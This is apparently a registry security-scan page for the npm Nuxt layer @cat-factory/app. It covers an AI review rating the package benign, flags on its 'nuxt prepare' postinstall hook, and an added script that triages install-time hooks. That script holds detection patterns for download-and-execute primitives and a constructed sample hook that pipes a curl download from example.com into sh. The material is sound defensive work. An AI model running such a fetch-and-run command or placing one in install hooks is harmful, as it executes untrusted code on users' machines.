@cat-factory/app@0.91.0

Reusable Nuxt layer for the Agent Architecture Board SPA (components, stores, composables, pages). Consume it from a thin deployment app via `extends: ['@cat-factory/app']` and point it at your backend with NUXT_PUBLIC_API_BASE. See deploy/frontend for an

AI Security Review

scanned 7h ago · by lpm-firewall-ai

No confirmed malicious attack surface. The install-time hook runs Nuxt's standard prepare step for a Nuxt layer, and runtime network/credential handling is aligned with the app's documented backend workflows.

Static reason
One or more suspicious static signals were detected.
Trigger
npm postinstall or user running the SPA
Impact
No credential exfiltration, persistence, destructive behavior, or foreign AI-agent control-surface mutation identified
Mechanism
Nuxt layer configuration and browser API client
Rationale
Static inspection shows a large Nuxt SPA layer with a standard `nuxt prepare` postinstall and package-aligned client API/WebSocket code. Suspicious scanner labels are explained by normal frontend networking, auth/session handling, and user-invoked credential storage flows, with no concrete malicious chain.
Evidence
  • package.json
  • nuxt.config.ts
  • app/composables/useApi.ts
  • app/composables/api/client.ts
  • app/composables/useWorkspaceStream.ts
  • app/stores/auth.ts
  • app/stores/personalSubscriptions.ts
Network endpoints (5)
  • localhost:8787
  • github.com/settings/tokens/new
  • gitlab.com/-/user_settings/personal_access_tokens
  • github.com
  • openrouter.ai/keys

Decision evidence

public snapshot
The AI classifier rated this package Clean (Benign) at 94.0% confidence, with low false-positive risk.
Evidence for block
  • package.json defines postinstall: nuxt prepare
Evidence against
  • package.json has no bin and main is nuxt.config.ts for a Nuxt layer
  • nuxt.config.ts only configures Nuxt modules, i18n, CSS paths, and local default apiBase
  • No package files or binaries for preinstall/install payloads found
  • No child_process, eval/vm/Function, native addon, or filesystem write/delete primitives found in package source
  • Network code is SPA client behavior to configured cat-factory backend and user-facing OAuth/provider URLs
  • Secrets/tokens are submitted to configured backend APIs or cached locally for app workflow; no exfiltration endpoint found
Behavioral surface
Source
  • Child Process
  • Filesystem
  • Network
  • WebSocket
Supply chain
  • URL Strings
Manifest
  • No License
scanned 195 file(s), 729 KB of source, external domains: acme.atlassian.net, example.com, github.com

Source & flagged code

2 flagged

package.json
scripts.postinstall = nuxt prepare
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.json
scripts.postinstall = nuxt prepare
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.
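The two flags above are the generic shape of an install-script finding: npm runs the hook automatically, and the scanner could not match `nuxt prepare` against its static allowlist, so a human has to decide. The script below is an added example, not code from this registry page or from the @cat-factory/app package. It reads the `scripts` block of a package.json, picks out the install-time hooks, and triages each command into "allowlisted" (a known-benign build step), "review" (unknown, needs a look) or "high" (contains a download-and-execute primitive). The hook list, the allowlist and the high-risk patterns are assumptions chosen for illustration, not the scanner's real rule set; the manifests at the bottom are constructed.

```javascript
// Added example, not code from the registry page or from @cat-factory/app.
// Triage install-time lifecycle scripts in a package.json the way a reviewer
// would handle the "Install Time Lifecycle Scripts" / "Ambiguous Install
// Lifecycle Script" flags. INSTALL_HOOKS, ALLOWLIST and HIGH_RISK are
// assumptions for illustration, not the scanner's real rules.

// npm runs these automatically on `npm install` unless --ignore-scripts is set.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

// Whole-command patterns a reviewer accepts without opening the package body.
const ALLOWLIST = [
  /^(nuxt|nuxi) prepare$/,
  /^husky( install)?$/,
  /^tsc( -p \S+)?$/,
];

// Primitives that turn an install hook into a code-execution or exfiltration vector.
const HIGH_RISK = [
  /\b(curl|wget)\b/,        // remote fetch
  /\bnode\s+-e\b/,          // inline JavaScript
  /\b(bash|sh)\s+-c\b/,     // inline shell
  /\|\s*(sh|bash)\b/,       // pipe-to-shell
  /\beval\b/,
  /base64/,                 // encoded payload
  /process\.env/,           // reading secrets from the installer's environment
];

function classifyCommand(command) {
  const cmd = command.trim();
  if (HIGH_RISK.some((re) => re.test(cmd))) return 'high';
  // Allowlist patterns are anchored: a chained command such as
  // `nuxt prepare && curl ...` never matches and falls through to review.
  if (ALLOWLIST.some((re) => re.test(cmd))) return 'allowlisted';
  return 'review';
}

// Returns one record per install-time hook present in the manifest.
function auditLifecycleScripts(packageJson) {
  const scripts = (packageJson && packageJson.scripts) || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook], verdict: classifyCommand(scripts[hook]) }));
}

// Collapses a report to the single verdict that should drive an install policy.
function worstVerdict(report) {
  const rank = { none: 0, allowlisted: 1, review: 2, high: 3 };
  return report.reduce((worst, r) => (rank[r.verdict] > rank[worst] ? r.verdict : worst), 'none');
}

// Constructed manifests. The first mirrors the single hook flagged on this
// page; the second is a made-up malicious shape used only to exercise the code.
const LAYER_MANIFEST = {
  name: '@cat-factory/app',
  main: 'nuxt.config.ts',
  scripts: { postinstall: 'nuxt prepare' },
};

const SUSPICIOUS_MANIFEST = {
  name: 'constructed-example',
  scripts: {
    preinstall: 'curl -s https://example.com/x.sh | sh',
    postinstall: 'node scripts/setup.js',
  },
};

for (const manifest of [LAYER_MANIFEST, SUSPICIOUS_MANIFEST]) {
  const report = auditLifecycleScripts(manifest);
  console.log(manifest.name, '->', worstVerdict(report));
  for (const r of report) console.log(`  ${r.hook}: ${r.verdict}  (${r.command})`);
}
```

In practice the audit belongs in front of the install, not after it: fetch the tarball or run `npm pkg get scripts` in the unpacked package, triage, and install with `npm ci --ignore-scripts` so nothing runs until the verdict is in. For this package that means the `.nuxt` type stubs `nuxt prepare` would have generated are missing afterwards, so the reviewed step has to be run by hand (`npx nuxi prepare` in the consuming app) once the package has been accepted.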

Findings

1 High, 2 Medium, 4 Low
  • High: Install Time Lifecycle Scripts (package.json)
  • Medium: Ambiguous Install Lifecycle Script (package.json)
  • Medium: Network
  • Low: Scripts Present
  • Low: Filesystem
  • Low: URL Strings
  • Low: No License